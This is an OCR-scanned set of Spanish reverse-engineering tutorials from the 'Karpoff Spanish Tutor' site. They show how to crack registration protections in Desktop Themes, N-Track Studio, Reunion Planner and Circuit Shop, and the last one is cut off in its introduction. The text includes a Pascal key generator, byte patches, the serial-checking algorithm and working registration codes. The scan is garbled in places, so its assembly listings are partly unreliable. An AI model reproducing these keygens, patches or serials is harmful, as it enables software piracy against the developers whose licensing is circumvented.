017F:004305C8 61 6ÉE 00 00 52 6F 6É 61-6C 64 20 4A 20 53 6F 75 an..Ronald J Sou 
017F:004305D8 74 61 72 00 66 41 43 54-4F 52 20 27 39 38 00 00  tar.fACTOR '98.. 


¡Bueno, ya no hay duda! Nos encontramos, efectivamente con una "lista negra". El autor del software se ha 
dedicado a perder un poco de tiempo localizando Serial Numbers en la red (por cierto, hay un auténtico 
montón) y ha escrito el código necesario para que si introducimos un Name de los que circulan por ahí nos 
muestre el mensaje de error. Aunque también puede ser que nos muestre un mensaje de error en relacción 
con ésto que estamos hablando; la verdad es que no lo he comprobado. Además, si nos fijamos, durante toda 
ésta parte del código en la que se van cargando nombre de la "lista negra' se llama constantemente a la 
misma función con nuestro Name en el registro EAX y con el Name que se está extrayendo de la 'lista negra' 
apuntado por el registro ECX; concretamente es un CALL a la posición de memoria '00426C80'. 


Bueno, seguimos traceando con la tecla F10 hasta que lleguemos a la posición de memoria '0040588B'; en 
éste posición se inicia un bucle en el que se va recorriendo nuestro Name carácter a carácter. Lo que sigue es 
el código completo del bucle (antes de la primera instrucción, el registro ECX contendrá la longitud del Name 


que hayamos introducido; en mi caso 8) 


:0040588B 0FBE5405D4 


Name en 


:00405890 8BF8 
contador, 


0; 
índice al 


:00405892 83E701 
el 


registro 
si 


:00405895 47 
:00405896 OFAFD?7 
por 


:00405899 03DO 
multiplicación 


contador 
:0040589B O155FC 
:0040589E 40 
:0040589F 3BC1 


:004058A1 72E8 


movsx edx, byte ptr [ebp+eax-2C] 


mov edi, eax 


and edi, 00000001 


inc edi 
imul edx, edi 


add edx, eax 


add dword ptr [ebp-04], edx 
inc eax 
cmp eaxX, ecx 


jb 0040588B 


>Pone el primer carácter del 


>el registro EDX 
>El registro EAX actúa como 


>en el primer ciclo de bucle es 


>ésta instrucción mueve el 


>registro EDI 
>AND lógico del registro EDI; si 


>índice del contador en el 
>es par dará '0' como resultado; 
>es non dará '1' como resultado 


>Incrementa EDI 
>Multiplica el carácter del Name 


>EDI, que será '1l' o '2' 
>A1l resultado de la 


>anterior, se le añade el 
>Guarda el resultado en [EBP-04] 


>Incrementa el contador 
>¿Estamos al final del bucle? 


>Si no es así, repetir 


Bueno, después de que se ejecute completamente éste bucle, tendremos un valor guardado en la posición de 
memoria '[EBP-04]'. En mi caso éste valor es '046E'. Veamos lo que sucede ahora con éste valor: 


0177:004058A3 XOR 
en 


"82644404" 
0177:004058AA JGE 
0177:004058AC MOV 


0177:004058AF  NEG 
EAX 

0177:004058B1 MOV 
en 


DWORD PTR [EBP-04],82644404 


004058B4 
EAX, [EBP-04] 


EAX 


— 


EBP-04],EAX 


>Hace un XOR del valor guardado 


>[EBP-04] con la constante 


> 
>Mueve el resultado de XOR al 
>registro EAX 

>Calcula el completo a dos de 


>Y vuelve a guardar el resultado 


> [EBP-04] 


Seguimos traceando el programa con F10 y rápidamente llegamos a éste trozo de código; el más crítico: 


0177:004058C6 SUB 

0177:004058CD LEA 

0177:004058D0 PUSH 
0177:004058D1 CALL 
que 


registro EAX 
0177:004058D6  CMP 


Serial 


que 


DWORD PTR [EBP-04],00002B0D 
EAX, [EBP-70] 

EAX 

0041E795 


— 


EBP-04],EAX 


Si observamos la ventana Registers veremos lo siguiente: 


v 


Este CALL pone el Serial Number 


>hemos introducido en el 
>Y aquí se compara nuestro 


>Number, falso, con el auténtico 


>está guardado en [EBP-04] 


EAX=00123456 EBX=0043041C ECX=00435432 EDX=000000D1 ESI=00684BE0O 
EDI=00000002 EBP=0066EE5C ESP=0066EBD8 EIP=004058D6 odIlszApe 


Ccs=0177 DS=017F ss=017E ES=017E FS=12A7 GSs=0000 SS:0066EE58=7D9BBF96 


¿Puede ver el contenido del registro EAX? Es '123456' que es el valor hexadecimal del valor decimal 
'1193046'. Y en la última línea, a la derecha, veremos el contenido de la posición de memoria '[EBP-04]', que 
'7D9BBF96'. Vamos a ponerlo en claro: ésta instrucción lo que hace es compara el valor hexadecimal del 
Serial Number que hemos introducido con otro valor. Por lo tanto lo único que nos resta hacer es convertir 
ése valor a decimal, y tendremos el Serial Number necesario para registrar el programa con nuestro Name. 


Por lo tanto, '7D9BBF96' hexadecimal, en decimal es '2107359126'. ¡Que es el Serial Number auténtico! 


El parche 


En realidad no necesitamos ningún parche. Con la información que poseemos podemos, perfectamente hacer 
un Key Generator. 


¡Aquí está; un Key Generator! Por cierto, es el primero que hago. ¡Disculpen los errores si los hay; aunque 
creo que no! Una última cuestión: el Key Generator no comprueba si se ha introducido ningún valor como 
Name; ésto es así por que, aunque en Desktop Themes no introduzcamos un Name, si le proporcionamos el 
Code adecuado, se registra. ¡Un poco rarillo, pero así es. 


AA AO OR OR OK Cortar por 
AQUÍAF FERRER e Ad lee RR de ll RR e OR RR 


Program dtKG; 


Uses Crt; 

Var nombre : String[20]; 
i : integer; 
Xx : integer; 
serial : longlnt; 

Begin 


ClrScr;TextColor (White) ;¡Write('Key Generator by '); 
TextColor (LightRed) ¡Write ('MeG');TextColor (Yellow); 
Write('aB');TextColor (LightRed) ¿¡Writeln('iTe'); 
TextColor (15) ;¡writeln('Desktop Themes vl1.89')¿WritelLn; 
TextColor (7) ;Write('Introduzca su nombre: '); 


TextColor (15) ;ReadLn (nombre) ; 


for i := 0 to length (nombre)-1 do 
begin 

Xx := i AND 1; 

X := Xx + 1; 

serial := serial+(x*ORD (nombre[1+1])); 

serial := serial+i; 

end; 

serial := serial XOR $82644404; 
serial := (not serial)+1; 
TextColor (7); 
write('Corresponde el Code: Ny; 
TextColor(15);Write(serial); 
ReadKey 


End. 


ARA OOO OOOO OOOO Cortar por 
AQUÍ do doioR 


Final Notes 


Me gustaría saludar a mis crackers favoritos y de los que más he aprendido. Son éstos: 


Torntdo, The SandMan, BalckB, +Fravia, TNT!, ECD, Karpof, Wkt. Esto no quiere decir que no haya otros extraordinarios 
crackers. 


NOTA: Si le gusta el programa, cómprelo. Los programadores pierden demasiado tiempo desarrollando su software como 
para que vengamos nosotros y no les compensemos por su trabajo. ¡No es justo! 


Ensayo por: MeGaBiTe 
Página creada: 06/05/2000 


sobre 


Karpoff Spanish Tutor: Pagina dedicada a la divulgacion de informacion en Castellano, 


Ingenieria Inversa y Programacion. Email "Colabora con tus Proyectos" 


Karpoff Spanish Tutor 


Programa: N-Track Studio vl1.3.3 


PROTECCION: Name/Serial y limitación de tiempo (40 días). 
Descripcion: Utilidad para la creación de música. 
Dificultad: Principiante+ 

DOWNLOAD : http://199.217.92.26/dnload/ntrack.exe 


Herramientas: Softice(ó TRW2000), W32dasm y un editor hexadecimal. 


CRACKER: <KeKo> FECHA: 22/8/2000 


INTRODUCCION 


Hola colegas. Primero quiero decir que este es el primer tutorial que escribo, así que 
perdonadme si hay algún error. Llevo en esto sólo tres semanas, y como todo lo que 
sé (que es muy poco), lo he aprendido en tutoriales (sobre todo los del maestro 
Karpoff, que recomiendo), me he decidido a escribir uno por si puedo ayudar a 
alguien a dar sus primeros pasos. 

He elegido este programa porque me ha dado bastante la lata y porque es algo más 
complicado que cambiar un par de saltos ;). 


AL ATAKE 


Bueno, supongo que sabeis cómo se preparan las cosas ¿no?: Primero cargais el Soft-Ice si 
no lo habeis hecho ya, y luego instalais el programa, haceis una copia del ejecutable 
(ntrack.exe) y abríis esa copia con el w32dasm y con el editor hexadecimal. Bien, todo listo 
para empezar :). 


Voy a ir contando todo lo que hice, lo que salió mal también, porque creo que es 
interesante. Además como en muchos tutoriales no ponen los fallos, parece que siempre se 
acierta a la primera, y cuando tú no aciertas a la primera (ni a la segunda ;)), crees que lo 
haces mal. Si quereis saltaros esto e ir directamente a la solución correcta, sólo teneis que 


buscar una flecha como esta: --> 


Lo primero que se me ocurrió fué seguir el camino habitual, es decir, introducir un número 
cualquiera en el registro (bueno, en este caso son dos números), tomar nota del mensaje de 


error ("Wrong registration data. Please make sure ........ "), y buscarlo en el w32dasm. Lo que 
encontré fué lo siguiente: 


* Referenced by a (U)nconditional or (Cjonditional Jump at Addresses: 
1:0042E515(C), :0042E578(C) 


:0042E5D9 8B7508 mov esi, dword ptr [ebp+08] 
:0042E5DC 6A40 push 00000040 


* Possible StringData Ref from Data Obj ->"Registration" 


| 
:0042E5DE 6844134700 push 004713A4 


* Possible StringData Ref from Data Obj ->"Wrong registration data. Please " 
->"make sure you're typing the codes " 
->"correctly. To be sure simply copy " 
->"and paste the codes into the registration " 


->"dialog box." 
| 
:0042E5E3 6874124700 push 00471274 
:0042E5E8 56 push esi 


Aquí podemos ver el mensaje de error y desde donde se accede a él. Busquemos por tanto 
esas direcciones (42E515 y 42E578): 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 


1:0042E5F6(U) 

| 

:0042E50F 81FF88130000 cmp edi, 00001388 

:0042E515 OF8DBE000000 ¡nl 0042E5D9 <- Aquí está la primera 
:0042E51B 8D8DECFEFFFF lea ecx, dword ptr [ebp+FFFFFEEC] 
:0042E521 33F6 xor esi, esi 

* Referenced by a (U)nconditional or (C)onditional Jump at Address: 
1:0042E53C(U) 

| 

:0042E523 8A01 mov al, byte ptr [ecx] 

:0042E525 84C0 test al, al 

:0042E527 7415 je 0042E53E 

:0042E529 3C30 cmp al, 30 

:0042E52B 7C11 ¡1 0042E53E 

:0042E52D 3C39 cmp al, 39 

:0042E52F 7FOD jg 0042E53E 

:0042E531 OFBECO movsx eax, al 

:0042E534 8D14B6 lea edx, dword ptr [esi+4*esi] 
:0042E537 41 inc ecx 

:0042E538 8D7450D0 lea esi, dword ptr [eax+2*edx-30] 
:0042E53C EBE5 ¡mp 0042E523 


* Referenced by a (U)nconditional or (Cjonditional Jump at Addresses: 


|1:0042E527(C), :0042E52B(C), :0042E52F(C) 


| 
:0042E53E 8D95ECFDFFFF lea edx, dword ptr [ebp+FFFFFDEC] 
:0042E544 33C9 XOr eCxX, ecx 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 


1:0042E55F(U) 

| 

:0042E546 8A02 mov al, byte ptr [edx] 
:0042E548 84C0 test al, al 

:0042E54A 7415 je 0042E561 

:0042E54C 3C30 cmp al, 30 

:0042E54E 7C11 ¡1 0042E561 

:0042E550 3C39 cmp al, 39 

:0042E552 7FOD jg 0042E561 

:0042E554 OFBECO movsx eax, al 

:0042E557 8DOC89 lea ecx, dword ptr [ecx+4*ecx] 
:0042E55A 42 inc edx 

:0042E55B 8D4C48D0 lea ecx, dword ptr [eax+2*ecx-30] 
:0042E55F EBE5 ¡mp 0042E546 


* Referenced by a (U)nconditional or (Cjonditional Jump at Addresses: 
1:0042E54A(C), :0042E54E(C), :0042E552(C) 


| 
:0042E561 33C0 xor eax, eax 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 


1:0042E57B(U) 

| 

:0042E563 83F808 cmp eax, 00000008 

:0042E566 7315 ¡nb 0042E57D 

:0042E568 3B34C574104700 cmp esi, dword ptr [8*eax+00471074] 
:0042E56F 7509 ¡ne 0042E57A 

:0042E571 3B0CC578104700 cmp ecx, dword ptr [8*eax+00471078] 
:0042E578 745F je 0042E5D9 <- Y aquí la segunda. 

* Referenced by a (U)nconditional or (C)onditional Jump at Address: 
1:0042E56F(C) 

| 

:0042E57A 40 inc eax 

:0042E57B EBE6 ¡mp 0042E563 


Lo primero que se nos ocurre (al menos a mi), es eliminar esos saltos con el editor 
hexadecimal para que el programa siga su curso sin saltar al mensaje de error. En este caso 
eso no funciona, y os aconsejo que no lo probeis, porque el programa se queda colgado, ya 
que habremos creado un bucle infinito. 

Si miráis un poco más abajo del mensaje de error, os encontraréis con lo siguiente: 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 


1:0042E5D7(C) 

| 

:0042E5FB 8D4DEC lea ecx, dword ptr [ebp-14] 
:0042E5FE 68989B4600 push 00469B98 
:0042E603 51 push ecx 

:0042E604 895DEC mov dword ptr [ebp-14], ebx 


|* Reference To: MSVCRT._CxxThrowException, Ord:0041h 


| 
:0042E607 E804860300 Call 00466C10 


:0042E60C 8B450C mov eax, dword ptr [ebp+0C] 
:0042E60F 85C0 test eax, eax 

:0042E611 0OF85AE000000 ¡ne 0042E6C5 
:0042E617 8B5D0O8 mov ebx, dword ptr [ebp+08] 
:0042E61A 6A0O push 00000000 


* Possible StringData Ref from Data Obj ->"Registration succesful!" 
| 
:0042E61C 685C 124700 push 0047125C 


* Possible StringData Ref from Data Obj ->"Thank you for registering n-Track " 
->"Studio" 


:0042E621 6830124700 push 00471230 
:0042E626 53 push ebx 


Por eso mi segunda idea fué buscar el salto que llega aquí (42E5D7), y cambiarlo por un 

JMP para que salte siempre. ¿Sabeis cómo, verdad? En el w32dasm se hace doble click en la 
¡línea donde está el salto, luego se mira el offset en la línea inferior y se introduce ese offset 
¡en el buscador del editor hexadecimal (Ctrl+G). Para cambiarlo a un JMP basta sustituir el 

74 22 (je) por un EB 22 (¡mp). 

En este caso simplemente no hace nada. Sigue apareciendo el mensaje de error. ¿Por qué?. 
Pues porque el programa nunca llega a ejecutar ese salto. Podeis pensar que sólo tenemos 
que cambiar un par de saltos para dirigir el programa hacia ese punto y ya está, pero en este 
caso no es así. Veámoslo: 

Si teneis el programa desensamblado delante y lo estudiais un poco, vereis que algo más 

¡arriba hay un salto que pueden desviarnos del que hemos cambiado (el 42E5D7), y es: 

:0042E5AA 7549 jne 0042E5F5 

Bien, vamos a anularlo, es decir, en el edito hexadecimal cambiamos 75 49 por 90 90. 
Ahora ejecutamos el programa, metemos una clave cualquiera y.... "Thank you for 
registering n-Track Studio". Bieeeen, Vivaaaa. Pero un momento, si pulsamos Help-About, 
veremos de nuevo UNREGISTERED SHAREWARE, y lo mismo si cerramos el programa 
y lo volvemos a abrir. ¿Qué sucede?. Pues que hemos conseguido que salga el mensaje de 

registración, pero sin que el programa cambie los datos. Es decir, que sólo hemos cambiado 

un mensaje por otro, pero el programa sigue sin registrarse. 


--> Este es el momento de usar métodos más fuertes, es decir, nuestro gran amigo el Soft- 
Ice. Para ello borramos la copia modificada del programa y hacemos otra copia nueva del 
¡original para que no esté cambiada. Ahora vamos a la ventana de registro e introducimos 
unos datos cualesquiera. En mi caso: 

Your name: <KeKo> 
¡Reg. Code 1: 222222222 

Reg. Code 2: 444444444 

Vamos al Sice (=Soft-Ice), y ponemos un par de breakpoints para probar: — bpx 

getwindowtexta y bpx getdlgitemtexta. Volvemos al programa y pulsamos OK. Saltamos 
al Sice y vemos que el bpx que funciona es bpx getdlgitemtexta (por si lo volvemos a 
necesitar). Primero, ya que el programa tiene que leer tres datos, pulsamos F3 dos 


¡veces(cada vez que aparecemos en el Soft-Ice es porque lee un dato, luego tenemos que salir 
del Sice dos veces pulsando F5 para que así tenga leidos los tres datos la tercera vez que 
aparece la ventana del Soft-Ice ¿OK?). Ahora estamos en USER32.DLL, pero lo que 
queremos es estar en el ejecutable ntrack.exe, así que pulsamos una vez F12 para salir de 
esta subrutina, y ya nos encontramos en el ntrack.exe. Observaréis que aparecemos muy 
lejos de donde estuvimos trabajando con el w32dasm, así que hay que pulsar F10 como 
locos hasta que lleguemos a: 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 


[:0042E5F6(U) 

| 

:0042E50F 81FF88130000 cmp edi, 00001388 

:0042E515 0OF8DBE000000 ¡nl 0042E5D9 

:0042E51B 8D8DECFEFFFF lea ecx, dword ptr [ebp+FFFFFEEC] 
:0042E521 33F6 xor esi, esi <--- Parad aquí 


que era el primer salto al mensaje de error. En lugar de pulsar F10 tantas veces, podeis poner 
un breakpoint en esa línea (bpx 42E50f) y pulsar FS (primero borrad los otros bpx) y ya 
estaréis aquí. 
Os preguntaréis qué hace el programa en todas esas líneas que nos hemos saltado. Bien, lo 
¡que hace es comparar nuestra clave con otras de versiones anteriores del programa, y si 
coinciden, nos sale un mensaje diciendo que mandemos un e-mail para recibir las claves 
nuevas, pero para eso hay que estar registrado :). Podeis intentar encontrar esas claves como 
ejercicio. Yo lo hice creyendo que eran las actuales. ¡Vaya chasco! ;) 
Bueno, una vez llegados a este punto, si comprobamos el valor que se le asigna a ECX en 
¡la línea 0042E51B (escribiendo d ecx) veremos nuestro Registration Code 1. Esto empieza a 
ponerse interesante... Ahora os describo las siguientes líneas: 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 


1:0042E53C(U) 

| 

:0042E523 8A01 mov al, byte ptr [ecx] <---Toma el primer número de nuestro code 
:0042E525 84C0 test al, al <--- Comprueba que no es el último 

:0042E527 7415 je 0042E53E <--- Si es el último,salta. 

:0042E529 3C30 cmp al, 30 <--- Comprueba que es mayor que 0, 30 en hexadecimal 
:0042E52B 7C11 ¡1 0042E53E <--- Si es menor, salta. 

:0042E52D 3C39 cmp al, 39<--- Comprueba que es menor que 9, 39 en hexadecimal 
:0042E52F 7FOD jg 0042E53E<--- Si es mayor,salta. 

:0042E531 OFBECO movsx eax, al<--- Opera con el número 

:0042E534 8D14B6 lea edx, dword ptr [esi+4*esi] 

:0042E537 41 inc ecx 

:0042E538 8D7450D0 lea esi, dword ptr [eax+2*edx-30] 

:0042E53C EBE5 ¡mp 0042E523 


Que sea menor que cero o mayor que nueve en hexadecimal quiere decir que no es un 
número, sinó una letra o un signo. Por tanto si en nuestros codes hay letras o signos, salta y 
¡acaba mostrando el mensaje de error. Sólo puede haber números. Comprueba número a 
número hasta que llega al último y salta en: 
:0042E527 7415 je 0042E53E <--- Si es el último,salta. 


Las operaciones lo que hacen es ir guardando en EST nuestro code, en mi caso el 
222222222, 


| Una vez comprobado que no hay más que números en nuestro code, podreis ver con el Soft- 
Ice que vuelve a repetir el proceso con el Registration Code 2, y lo guarda en ECX. 

Ahora el programa hace ciertas operaciones con EAX que a nosotros no nos interesan. 
Después de esto, repite el proceso anterior con el Reg. Code 1, y guarda su valor en ECX. 
Realmente no sé para qué vuelve a repetir el proceso, pues hace exactamente lo mismo de 
antes, pero en lugar de guardar el número en ESI, lo guarda en ECX. El caso es que después 
tenemos lo siguiente: 


* Referenced by a (U)nconditional or (Cjonditional Jump at Addresses: 
1:0042E589(C), :0042E58D(C), :0042E591(C) 


| 
:0042E5A0 8BD7 mov edx, edi 


:0042E5A2 69D2FDDB0400 imul edx, 0004DBFD 

:0042E5A8 3BD1 cmp edx, ecx 

:0042E5AA 7549 ¡ne 0042E5F5 

:0042E5AC 8D95ECFDFFFF lea edx, dword ptr [ebp+FFFFFDEC] 
:0042E5B2 33C9 XOr €CX, €Cx 


Primero copia el valor de EDI (que si hacemos d edi veremos que es 1001) en edx, y luego 
multiplica EDX por 4DBFD (y si ponemos ?4DBFD vemos que en decimal es 318461). Por 
último compara el valor con ECX, que es nuestro Registration Code 1 (en mi caso 
222222222). Si no son iguales salta a 42E5ES5: 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 
1:0042E5AA(C) 


| 
:0042E5F5 47 inc edi 
:0042E5F6 E914FFFFFF ¡mp 0042E50F 


Allí, como podemos ver, se le suma 1 a EDI, y se salta a 42E50F, que es precisamente 
donde paramos el Soft-Ice la primera vez después de pulsar F10 muchas veces. Si no lo 
recordáis, id unas líneas más arriba, donde empecé a hablar del Soft-Ice y vereis que esa 
dirección está impresa. Lo que hace allí es comprobar que EDI todavía no vale 5000 (que es 
1388 en hexadecimal). Si lo es salta al error, y si no vuelve a repetirlo todo pero con EDI 
una unidad mayor. 

Es decir, para que no de error, nuestro code debe ser igual a 318461 multiplicado por un 
valor entre 1001 (el primer valor de EDI) y 5000 (el último). Como el que yo he introducido 
(222222222) no es así, al final dará error. Salimos por tanto del Sice he introducimos un 
número que cumpla esos requisitos, por ejemplo el 707620342 (que resulta de multiplicar 
318461 por el 2222, que está entre 1001 y 5000). Lo mejor es que useis vuestro propio 
número para practicar. Escojed un número cualquiera entre 1001 y 5000, multiplicado por 
318461 y ya tendréis un número válido para el Registration Code 1. Ahora volvemos a la 
pantalla de registración e introducimos los nuevos datos. En mi caso: 

Your name: <KeKo> 
Reg. Code 1: 707620342  <--- El número que acabamos de calcular. 
Reg. Code 2: 444444444  <--- Uno cualquiera. 

Y volvemos al Soft-Ice. Para no dar tantas vueltas, podemos poner bpx 42E5A2, e iremos 

directamente a donde lo dejamos antes: 


|:0042E5A2 69D2FDDB0400 imul edx, 0OO4DBFD <-- Aquí es donde lo dejamos 


|:0042E5A8 3BD1 cmp edx, ecx 


:0042E5AA 7549 ¡ne 0042E5F5 
:0042E5AC 8D95ECFDFFFF lea edx, dword ptr [ebp+FFFFFDEC] 
:0042E5B2 33C9 XOr €CX, €Cx 


|* Referenced by a (U)nconditional or (C)onditional Jump at Address: 


1:0042E5CD(U) 

| 

:0042E5B4 8A02 mov al, byte ptr [edx] 
:0042E5B6 84C0 test al, al 

:0042E5B8 7415 je 0042E5CF 

:0042E5BA 3C30 cmp al, 30 

:0042E5BC 7C11 j¡10042E5CF 

:0042E5BE 3C39 cmp al, 39 

:0042E5C0 7FOD jg 0042E5CF 

:0042E5C2 OFBECO movsx eax, al 

:0042E5C5 8D0OC89 lea ecx, dword ptr [ecx+4*ecx] 
:0042E5C8 42 inc edx 

:0042E5C9 8D4C48D0 lea ecx, dword ptr [eax+2*ecx-30] 
:0042E5CD EBE5 ¡mp 0042E5B4 


* Referenced by a (U)nconditional or (Cjonditional Jump at Addresses: 
1:0042E5B8(C), :0042E5BC(C), :0042E5C0(C) 


| 
:0042E5CF 69FFAOCEO100 imul edi, OOO1CEAO 


:0042E5D5 3BF9 cmp edi, ecx 
:0042E5D7 7422 je 0042E5FB 


Ahora sabemos que el número es válido y llegará un momento en que el salto 
:0042E5AA 7549 ¡ne 0042E5F5 
no se produzca. En mi caso, cuando EDI valga 2222 (que es el número que escogí entre 
1001 y 5000). Por tanto llegará un momento en que se ejecutará la línea 
:0042E5AC 8D95ECFDFFFF lea edx, dword ptr [ebp+FFFFFDEC] 
que es la siguiente, así que si no queremos pulsar F10 tropecientasmil veces hasta que EDI 
valga 2222 (o el valor que vosotros hayais escogido), podemos borra nuestro breakpoints y 
pones uno en esa línea, es decir bpx 42E5AC. Ahora sólo tenemos que pulsar ES y ya 
estamos allí. 


Ánimo, que esto se acaba :). Si os fijais en lo que viene ahora, vereis que se vuelve a 
repetir una vez más la comprobación de siempre (y ya es la cuarta vez), y mientras se va 
| guardando el Reg. Code 2 en ECX. Una vez Hecho esto, se multiplica EDI (que ahora vale 
2222 o bien el número que vosotros hayais escogido) por 1ICEAO (que en decimal es 
118432, para verlo basta escribir ?1CEAO), y se compara con ECX, que es nuestro code 2, 
en mi caso 444444444, y si son iguales salta al mensaje de "Thank you for Registering", 
pero si no lo son, como en este caso, vuelve a poner el dichoso mensaje de error. 


Bueno, supongo que ya está claro lo que hay que hacer ¿no?. Basta que el Registration 
Code 2 sea el producto de 118432 por el número que hayamos escogido entre 1001 y 5000 
para calcular el Registration Code 1. En mi caso: 

- Escojo el número 2222 (1001<2222<5000) 
- 2222 X 318461 = 707620342 
|- 2222 X 118432 = 263155904 


- Por último introduzco mis datos en el programa: 
Your name: <KeKo> 

Registration Code 1: 707620342 

Registration Code 2: 263155904 


le doy a OK y... ¡FUNCIONAAAAAAA! 


Si vamos a Help-About vemos "Registered to <KeKo>" (o el nombre que vosotros hayais 
puesto), y si cerramos y volvemos a abrir, seguimos registrados. Por fin, programa 
crackeado. 


Bueno, quisiera decir que este tutorial me ha quedado muy extenso y pude que pesado, 
pero comprended que es el primero. Espero ir mejorando con el tiempo. Se aceptan dudas y 
sugerencias en: kekosoftO yahoo.com . 


Quisiera darle las gracias a Karpoff por su labor. Aunque no lo conozco, fué gracias a su 
página y sus tutoriales por lo que empecé a interesarme por esto de la Ingeniería Inversa, y 
la verdad es que cada día me gusta más :) . 


Un saludo a todos los que hayais tenido la paciencia y el valor para haberos leido este 
tostón entero. Si me mandais vuestra dirección os enviaré una aspirina para el dolor de 
cabeza ;)) Hasta pronto. 


Karpoff Spanish Tutor: Pagina dedicada a la divulgacion de informacion en Castellano, sobre 


Ingenieria Inversa y Programacion. Email "Colabora con tus Proyectos" 


Karpoff Spanish Tutor 


Programa: Reunion Planner v4.7 


Unlock Code (Serial). Sólo te permite 10 entradas sino estás 


PROTECCION: registrado. 

Descripcion: Planificador de citas, reuniones, etc. 
Dificultad: Principiante+ 

DOWNLOAD : http: //www.minutiaesoftware.com/ 
Herramientas: Softice v3.xx 


CRACKER: LEiRUS FECHA: 22/08/2000 


INTRODUCCION 


Empezaremos como siempre, analizando un poco el comportamiento del programa en 
situaciones límites. Nada más ejecutarlo, nos dice que una ventanita que no es la versión 
registrada, y que por tanto, no vamos a poder poner nada más que 10 entradas en el 
programa. Nos pregunta si queremos registrarnos. Le damos a que sí y aparecemos en un 
formulario para que introduzcamos los datos personales, y una caja de texto donde pone 
"Demo" y un botoncillo gracioso donde pone "Enter". Bueno, ya sabemos que podemos 
meter un serial. Más tarde iremos en su busca. 


Ninguna de las utilidades analizadoras que utilizo (Filel nfo, FileScanner, FileAnalyzer), me 
detecta el lenguaje en que ha sido escrito el programa. No importa, vamos a atacar 
directamente con el SiCE y vamos a utilizar un método NO recomendado en la mayoría de 
los casos aunque en realidad funciona en muchos programas. 


Bueno, al quid de la cuestión que es lo que nos ha traído aquí. 


AL ATAKE 


MÉTODO UN TANTO "CAPULLÍN" PERO QUE FUNCIONA: 


Como dije anteriormente, vamos a explicar un método de trabajo que NO recomendaría que hiciese 
nadie, pues es un poco "lamer". El método en cuestión consiste básicamente en meter un serial en 
el programa y antes de dar al botoncillo, poner un BPX en lo típico (hmemcpy, getdlgitemtexta, 
getwindowtexta, messageboxa, etc) y esperar a que salte. Una vez hecho esto, tan sólo nos queda 
buscar datos que hayamos metido, tales como nuestro nombre, números no válidos, etc. Después, 
moviéndonos por la ventana de datos, podemos buscar cosas que "sospechosas". Es posible que el 
serial que buscamos esté en posiciones de memoria contiguas. 


Esto es un hecho empíricamente comprobado, es decir, que no es una ley. Además, sólo sirve para 
algunos programas. 


Explicar el porqué de esta "predisposición" de los programadores es sencillo. Éstos, al comparar dos 
cadenas, que son representadas como nuestro serial y el que ha generado el ordenador, serán 
pasadas como argumentos de una función, por lo que lo lógico será que se almacenen en posiciones 
de memoria adyacentes, con el único fin de ahorrar trabajo al programador en el proceso de 
depuración. 


Existen multitud de programas que se basan en esta ¿¿¿¿protección????, aunque debido al 


conocimiento y al auge al que han llegado las técnicas de cracking, cada vez quedan menos 
programas así de facilones. 


Una vez explicado esto, pasamos pues a atacar al susodicho. 


CON "S" DE SiCE: 


El turno de SiCE, como siempre. Tareas requeridas: arrancar el SiCE de una vez, que se te congelan 
las pelotas, vamos chavalín. 


Rulamos el ReunionPlanner. Bien, nos vamos a la "zona serial". Ponemos uno falso, el primero que 
se nos pase por la mente. Yo pongo mi número favorito "147258369". Antes de darle a "Enter", 
debemos entrar en SiCE y poner los BPX que antes hemos dicho. 

Lo más probable es que te salten 108.000 veces por lo menos, pero tras 6 ó 7 veces de darle a 
Ctrl +D, vamos a utilizar el comando "S", Search in Memory o Buscar en Memoria del SiCE. Este 
comando busca por el espacio de memoria virtual de 4Gb en busca de la cadena especificada. Su 
sintaxis es la siguiente: 

S [-cul] [address L length data- list] 


Para más información, acude al genial TUT de BlackFénix acerca de SiCE, con todo su "espectro" 
comentado. 


El ejemplo y la orden que utilizaremos normalmente será la siguiente: 


S 30:00 L ff 'cadena' (cadena normalmente representará nuestro nombre -LE¡RUS-, o 
nuestro serial introducido -147258369-) 


Si se encuentra un dato, será mostrado en la ventada de datos. Para seguir con la siguiente 


¡coincidencia, basta con pulsar la tecla "S" y presionar Enter. 


NOS ENCONTRAMOS CON UNA SORPRESITA: 


¡Tras hacer lo que he dicho anteriormente, nos encontraremos con el serial que válido, que tendrá la 
forma: RPxxxxx en "condecoración" al nombre del programa, ReunionPlanner. 


CONSIDERACIONES FINALES: 


¡| Desde luego, no se puede dejar a un programador con una mente comercial trabajar, porque sino, 


| Marketing, que por unas pesetas venden su pobre y despojada mente de ideas contemporáneas. 


| 
Bueno, después de todo esta sarta de paranoias y estupideces varias, sólo resta despedirme, como 
¡es normal en mis escritos. 
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Ingenieria Inversa y Programacion. Email "Colabora con tus Proyectos" 
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Programa: Circuit Shop v1.09 


PROTECCION: 


Serial Number. Shareware de 30 dias con varias funciones deshabilitadas. 


Descripcion: Programa para el diseño de circuitos analógicos y digitales. 


A 


DOWNLOAD : 


http://ourworld.compuserve.com/homepages/Cherrywood/ 


Herramientas: Softice v3.24 y cualquier editor Hexadecimal. 
CRACKER: Arkanian FECHA: 25/08/2000 


| INTRODUCCION 


Bueno, he hecho esto por proporcionar un enfoque distinto a los procedimientos habituales del bpx 
Get'"'loquesea'' o de buscar el mensaje del "Registro no válido'' o similar en el W32dsmg89 y de ahí tirar 
hacia atrás. 


De todas formas vamos a conseguir lo mismo empezando por el principio, quizas con un poco más de trabajo, 
pero el resultado será de lo más satisfactorio. Además el programa es una "perita en dulce" que no se puede 
dejar pasar así como así. Cosas sencillas como esta ya no se encuentran. 


Vamos a utilizar el Sice (Soft CE) con una configuración básica del winice.dat que se puede bajar de aquí. 
Ya cambiarás la configuración del winice.dat "a mano" cuando le vayas pillando el truco a todo esto. De 
momento creo que es suficiente con esto. 


e Sino quieres perder tu configuración actual, renombra el winice.dat que tienes en el directorio del 
SofICE por winice.old (por ejemplo) y copia el winice.dat nuevo (ya descomprimido) al mismo 
directorio. Para volver a la configuración anterior haz a la inversa. 


VISTAZO PRELIMINAR 


Iniciamos el programa y aparte de la ventana principal vemos que se despliegan también tres barras de herramientas 
diversas a la derecha de la pantalla y otra ventana central que es la que nos indica que es una versión sin registrar del 
producto, el copyright, etc... 


Esta ventana es de lo más mosqueante. El tipo de letra, el fondo blanco, los botones, vamos, el formato en general me 
